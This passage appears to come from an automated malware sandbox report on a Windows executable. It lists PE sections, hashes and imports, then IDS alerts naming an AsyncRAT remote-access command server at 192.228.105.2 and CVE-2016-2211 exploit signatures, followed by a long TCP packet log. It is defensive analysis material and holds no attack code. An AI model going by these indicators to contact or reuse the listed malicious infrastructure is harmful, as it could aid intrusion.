                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x174700x22c.data
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .code0x10000x37f00x38006c0f4094a5493360ae8c9032ef3a9f47False0.47140066964285715data5.608776130769213IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .text0x50000xd2c20xd4001da643e4b1937b50550f9d9e8250428eFalse0.5114239386792453data6.558083729279072IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x130000x339d0x34004fb07923b0eb72c40319d48fd2d4f13fFalse0.8046123798076923data7.110640338733979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x170000x172c0x1200eaabfcf57026d28490362be396399d18False0.3940972222222222data4.9982528357942035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x190000x32b200x32c0034d7982ed4be8dbcc573aef9a940ccc9False0.15244477370689655data3.9269253240957918IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_ICON0x192ac0x32488Device independent bitmap graphic, 256 x 390 x 32, image size 199680, resolution 4724 x 4724 px/m0.14780054379491164
                    RT_RCDATA0x4b7340x146data1.0337423312883436
                    RT_RCDATA0x4b87c0x15data1.4285714285714286
                    RT_RCDATA0x4b8940xezlib compressed data1.5714285714285714
                    RT_RCDATA0x4b8a40x1very short file (no magic)9.0
                    RT_GROUP_ICON0x4b8a80x14data1.2
                    RT_MANIFEST0x4b8bc0x263XML 1.0 document, ASCII text0.5319148936170213
                    DLLImport
                    MSVCRT.dllmemset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
                    KERNEL32.dllGetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, GetProcAddress, GetVersionExW, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
                    USER32.DLLCharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
                    GDI32.DLLGetStockObject
                    COMCTL32.DLLInitCommonControlsEx
                    SHELL32.DLLShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
                    WINMM.DLLtimeBeginPeriod
                    OLE32.DLLCoInitialize, CoTaskMemFree
                    SHLWAPI.DLLPathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                    2024-07-30T11:11:42.588306+0200TCP2035607ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)770749712192.228.105.2192.168.2.7
                    2024-07-30T11:11:39.236465+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970713.85.23.86192.168.2.7
                    2024-07-30T11:12:17.516412+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971413.85.23.86192.168.2.7
                    TimestampSource PortDest PortSource IPDest IP
                    Jul 30, 2024 11:11:21.247751951 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:21.247850895 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:21.247961044 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:21.258354902 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:21.258387089 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:21.834490061 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:21.834578037 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:21.839215040 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:21.839229107 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:21.839500904 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:21.850455046 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:21.896501064 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.042943954 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.043024063 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.043061972 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.043091059 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.043121099 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.043163061 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.043188095 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.044003963 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.044064999 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.044085979 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.045300961 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.045375109 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.045388937 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.045416117 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.045459986 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.045810938 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.045979977 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.046045065 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.046057940 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.048641920 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.048697948 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.048716068 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.095114946 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.135094881 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.135308981 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.135360956 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.135370016 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.135413885 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.135489941 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.135509968 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.136068106 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.136104107 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.136126041 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.136142015 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.136195898 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.136209965 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.136337996 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.136387110 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.136400938 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.136838913 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.136893988 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.136908054 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.137268066 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.137314081 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.137325048 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.137339115 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.137392998 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.137423038 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.137566090 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.137779951 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.137793064 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.137840033 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.137870073 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.137892962 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.137909889 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.137963057 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.138313055 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.138729095 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.138777971 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.138799906 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.179682970 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.179748058 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.179800987 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.222115040 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.227607012 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.227766991 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.227839947 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.227879047 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.228023052 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.228089094 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.228112936 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.228425980 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.228512049 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.228527069 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.228771925 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.228837967 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.228851080 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.228943110 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.229012012 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.229024887 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.229119062 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.229181051 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.229195118 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.229737997 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.229804993 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.229818106 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.229899883 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.229960918 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.229975939 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.230241060 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.230298996 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.230312109 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.230396986 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.230452061 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.230464935 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.230905056 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.230968952 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.230982065 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.231076002 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.231144905 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.231161118 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.231625080 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.231702089 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.231714010 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.231739998 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.231803894 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.231832027 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.232428074 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.232512951 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.232527018 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.232553959 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.232623100 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.232678890 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.232692957 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.232778072 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.232830048 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.232842922 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.232937098 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.232994080 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.233006954 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.233350039 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.233411074 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.233423948 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.233530045 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.233592033 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.233604908 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.233695030 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.233757019 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.233769894 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.234198093 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.234258890 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.234272003 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.260422945 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.260472059 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.260543108 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.267621040 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.272303104 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.272380114 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.272433043 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.272464037 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.317104101 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.351871967 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.352360964 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.352426052 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.352466106 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.352582932 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.352649927 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.352667093 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.352788925 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.352844000 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.352849007 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.352871895 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.352935076 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.352952957 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.353110075 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.353178024 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.353193045 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.353280067 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.353368044 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.353492022 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.353506088 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.353514910 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.353532076 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.353565931 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.353611946 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.354002953 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.354146957 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.354202032 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.354216099 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.354304075 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.354360104 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.354373932 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.354752064 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.354804039 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.354819059 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.354904890 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.354958057 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.354973078 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.355535030 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.355592012 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.355606079 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.355703115 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.355757952 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.355787039 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.355873108 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.355927944 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.355942011 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.360393047 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.360466003 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.360511065 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.360536098 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.360584974 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.360618114 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.365175009 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.365226984 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.365257025 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.365252972 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.365313053 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.365354061 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.370073080 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.370132923 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.370162010 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.370246887 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.370292902 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.370304108 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.375157118 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.375225067 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.375247955 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.375560999 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.375571012 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.375617027 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.380270004 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.380425930 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.380475998 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.380495071 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.380656004 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.380708933 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.380717993 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.380846977 CEST4434970434.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:22.380907059 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.390479088 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:22.785465956 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:23.192812920 CEST49704443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:23.961867094 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:23.961908102 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:23.961986065 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:23.965868950 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:23.965881109 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.485652924 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.485742092 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.487723112 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.487731934 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.487982988 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.494545937 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.540499926 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.677959919 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.678073883 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.678113937 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.678124905 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.678168058 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.678205013 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.678210974 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.678219080 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.678265095 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.678529978 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.678711891 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.678747892 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.678755045 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.679069042 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.679105997 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.679112911 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.682884932 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.682914972 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.682930946 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.682936907 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.682975054 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.766083002 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.766232967 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.766268969 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.766273975 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.766288042 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.766320944 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.766330957 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.766747952 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.766789913 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.766793013 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.766803026 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.766848087 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.766855955 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.766891956 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.766937017 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:24.766944885 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.767627001 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:24.767661095 CEST4434970534.117.33.233192.168.2.7
